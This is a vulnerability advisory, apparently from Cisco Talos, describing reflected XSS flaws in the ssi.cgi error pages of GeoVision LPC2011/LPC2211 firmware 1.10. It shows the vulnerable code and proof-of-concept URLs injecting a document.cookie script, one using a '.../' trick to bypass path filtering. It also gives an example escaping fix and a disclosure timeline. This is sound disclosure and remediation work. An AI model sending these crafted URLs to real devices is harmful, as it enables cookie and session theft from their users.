CVE-2026-7371, CVE-2026-42366
Multiple exploitable reflected cross-site scripting (XSS) vulnerabilities exist in the Web Interface / ssi.cgi functionality of LPC2011/LPC2211 (version(s): 1.10). A specially crafted malicious URL can lead to arbitrary JavaScript code execution. An attacker can provide a crafted URL to trigger these vulnerabilities.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LPC2011/LPC2211 (version(s): 1.10)
LPC2011/LPC2211 - https://www.geovision.com.tw/product/GV-LPC2011
7.4 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
CWE-79 - Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
The vulnerable code can be seen here:
fd = (_IO_FILE *)fopen64(file_to_open, "r");
if ( !fd )
{
    printf(
        "<HTML><HEAD><TITLE>%s</TITLE></HEAD>\n"
        "<BODY><H2>%s</H2>\n"
        "The requested server-side-includes filename, %s,\n"
        "does not seem to exist.\n"
        "</BODY></HTML>\n",
        "404 Not Found",
        "404 Not Found",
        file_to_open);
    exit(1);
}
Where file_to_open is a value extracted from the requested URL. The vulnerable code is triggered when attempting to open a page that doesn’t exist. For example:
Request:
http://10.10.0.102/ssi.cgi/%3Cscript%3Ealert(document.cookie)%3C/script%3E
Response:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY><H2>404 Not Found</H2>
The requested server-side-includes filename, /www/<script>alert(document.cookie)</script>,
does not seem to exist.
</BODY></HTML>
The vulnerable code can be seen here:
if ( strstr(file_to_open, "../")
    || g_CGI_PATTERN && match_pattern((char *)g_CGI_PATTERN, (unsigned __int8 *)file_to_open)
    || match_pattern("**.php", (unsigned __int8 *)file_to_open) )
{
    printf(
        "<HR><H2>%s</H2>\nThe filename requested in the %s %s=%s directive\nmay not be fetched.\n<HR>\n",
        "Not Permitted",
        "initial",
        "PATH_TRANSLATED",
        file_to_open);
    exit(1);
}
Where file_to_open is a value extracted from the requested URL. To reach this vulnerable code, the requested URL needs to match one of the forbidden patterns checked in the if statement, in particular ../.
For example, by requesting a URL with .../ in it (the extra . used to avoid path normalization) we can see the following:
Request:
curl http://10.10.0.102/ssi.cgi/a/.../%3Cscript%3Ealert(document.cookie)%3C/script%3E
Response:
<HR><H2>Not Permitted</H2>
The filename requested in the initial PATH_TRANSLATED=/www/a/.../<script>alert(document.cookie)</script> directive
may not be fetched.
<HR>
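Both error branches shown above echo file_to_open into the response without output encoding. The following is an added example, not the vendor's patch or code from the advisory, of HTML-escaping the value before it is formatted into the 404 page; the same helper applies to the "Not Permitted" branch. The names html_escape and render_not_found, and the buffer sizes, are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* HTML-escape `in` into `out`; returns 0, or -1 (out emptied) if it does not fit. */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t used = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;           /* default: copy the byte unchanged */
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = strlen(rep);
        if (used + len >= outsz) {       /* fail closed, never emit a cut-off entity */
            out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, len);
        used += len;
    }
    out[used] = '\0';
    return 0;
}

/* Hypothetical replacement for the 404 branch; writes the page into `page`. */
int render_not_found(const char *file_to_open, char *page, size_t pagesz)
{
    char safe[1024];
    if (html_escape(file_to_open, safe, sizeof safe) != 0)
        strcpy(safe, "(name too long)");
    return snprintf(page, pagesz,
        "<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>\n"
        "<BODY><H2>404 Not Found</H2>\n"
        "The requested server-side-includes filename, %s,\n"
        "does not seem to exist.\n</BODY></HTML>\n", safe);
}

int main(void)
{
    char page[2048];  /* constructed input: the decoded path from the first request */
    render_not_found("/www/<script>alert(document.cookie)</script>", page, sizeof page);
    fputs(page, stdout);
    return 0;
}
```

With the escaped value, the browser renders the requested name as text instead of parsing it as markup.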
2026-02-17 - Initial Vendor Contact
2026-02-24 - Vendor Disclosure
2026-04-14 - Vendor Patch Release
2026-06-15 - Public Release
Philippe Laulheret of Cisco Talos